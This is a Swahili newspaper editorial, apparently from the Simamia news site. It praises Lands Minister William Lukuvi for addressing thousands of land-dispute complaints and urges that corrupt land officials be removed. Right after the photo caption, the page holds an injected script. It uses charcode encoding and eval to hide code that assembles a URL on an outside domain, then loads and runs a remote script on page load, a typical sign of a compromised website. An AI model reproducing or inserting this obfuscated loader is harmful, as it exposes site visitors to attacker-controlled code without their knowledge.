Recent Comments

Lukuvi ameonesha njia, aungwe mkono

By Baraka Bitariho Sep 27, 2015
<p>The Minister for Lands, Housing and Human Settlements Development, Mr. William Lukuvi</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Waziri wa Ardhi, Nyumba na Maendeleo ya Makazi, William Lukuvi.
Waziri wa Ardhi, Nyumba na Maendeleo ya Makazi, William Lukuvi.

WAZIRI wa Ardhi, Nyumba na Maendeleo ya Makazi, William Lukuvi amebainisha kuwa amepokea kero 3,180 za migogoro ya ardhi. Alisema hayo wakati akisikiliza kero mbalimbali juzi, zinazohusu ardhi kutoka kwa wananchi wilayani Kinondoni, Dar es Salaam.

Lukuvi alisema katika migogoro hiyo, kero 2,500 zimeshajibiwa. Kazi hiyo ameianza tangu ateuliwe kushika nafasi hiyo Januari mwaka huu. Kero hizo ni za kutoka mikoa ya Rukwa, Mbeya, Manyara, Dar es Salaam, Iringa, Arusha, Mwanza na Shinyanga.

Mbali na kero za mikoa hiyo, Lukuvi alibainisha kuwa kwa juzi pekee akiwa wilaya hiyo ya Kinondoni, alipokea malalamiko mengine mapya 151 na aliahidi ndani ya miezi miwili kuanzia sasa, majibu yake yatatolewa.

Kazi hiyo aliyoifanya Waziri Lukuvi katika kipindi cha muda mfupi cha chini ya mwaka mmoja ni cha kupongezwa, kwani malalamiko yamekuwa mengi na mengine yana zaidi ya miaka mitano, lakini hayapatiwi majibu.

Tunakiona kitendo cha Lukuvi kuwa ni cha kutiwa moyo. Tunaomba Lukuvi asiachiwa peke yake kazi hiyo, kwani kumuachia peke yake ni sawa na kurudisha nyuma juhudi hizo, ukizingatia kuwa uchaguzi mkuu utafanyika mwezi ujao na itaundwa serikali mpya, ambayo hatujui nani atapokea kijiti kutoka kwa Lukuvi.

Malalamiko ya ardhi kwa sasa yamekuwa sugu na baadhi ya wananchi wamekata tamaa kutokana na kutotatuliwa. Badala yake, walalamikaji wamekuwa wakiambiwa ‘njoo kesho’ na wakienda, hakuna kilichofanyika.

Kupitia malalamiko hayo, baadhi ya watendaji wasio waaminifu, wametumia nafasi hiyo kujipatia rushwa na wale wenye kipato kidogo ndiyo wanaoumia zaidi na haki yao kupotea. Sisi tumefurahishwa na hatua alizochukua Lukuvi katika utendaji wake huo.

Tunatoa angalizo kwa wakurugenzi ambao halmashauri zao zina malalamiko mengi ambayo hayajafanyiwa kazi, wamsaidie Lukuvi kutoa majibu ya malalamiko hayo. Sio wao pekee, bali wasaidiane na watendaji wao katika kushughulikia malalamiko hayo.

Watendaji wanaoonekana kikwazo ndio watuhumiwa wa malalamiko hayo, tunaomba wachukuliwe hatua haraka, ikiwemo kuwaondoa kazini na si kuwapa uhamisho. Kuna baadhi ya malalamiko yanafanywa na watendaji katika halmashauri na hata Wizara yenyewe ya Ardhi, kama ya kuuziwa kiwanja mara mbili, kuidhinisha maeneo ya wazi kwenye uuzaji, kushiriki kubadilishwa hati kinyume cha sheria na hata viwanja vilivyopimwa vocha zake kushikiliwa badala ya kuuziwa wananchi.

Malalamiko ya aina hii ni kero kubwa na yanawaumiza wananchi wengi, hivyo tunategemea watendaji wa aina hii watashughulikiwa haraka kwa mujibu wa sheria ili katika kipindi hiki kilichobaki kupata serikali nyingine, tusiingie na watendaji wa aina hii.

Hili linawezekana kwa Lukuvi, kusaidiwa na watendaji wengine wenye mamlaka na wanaowafahamu wenye matatizo hayo. Sasa hivi watendaji wanaohusika na masuala ya ardhi, ndiyo ‘matajiri’, inawezekana kuliko watendaji wengine wote serikalini.

Utajiri wao huo unatokana na kutowatendea haki wananchi, ikiwemo kupokea rushwa. Hivyo tunawasihi wenye mamlaka ya kuwawajibisha watendaji wa aina hii, wafanye juhudi za kutosha kukomesha hali hiyo.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com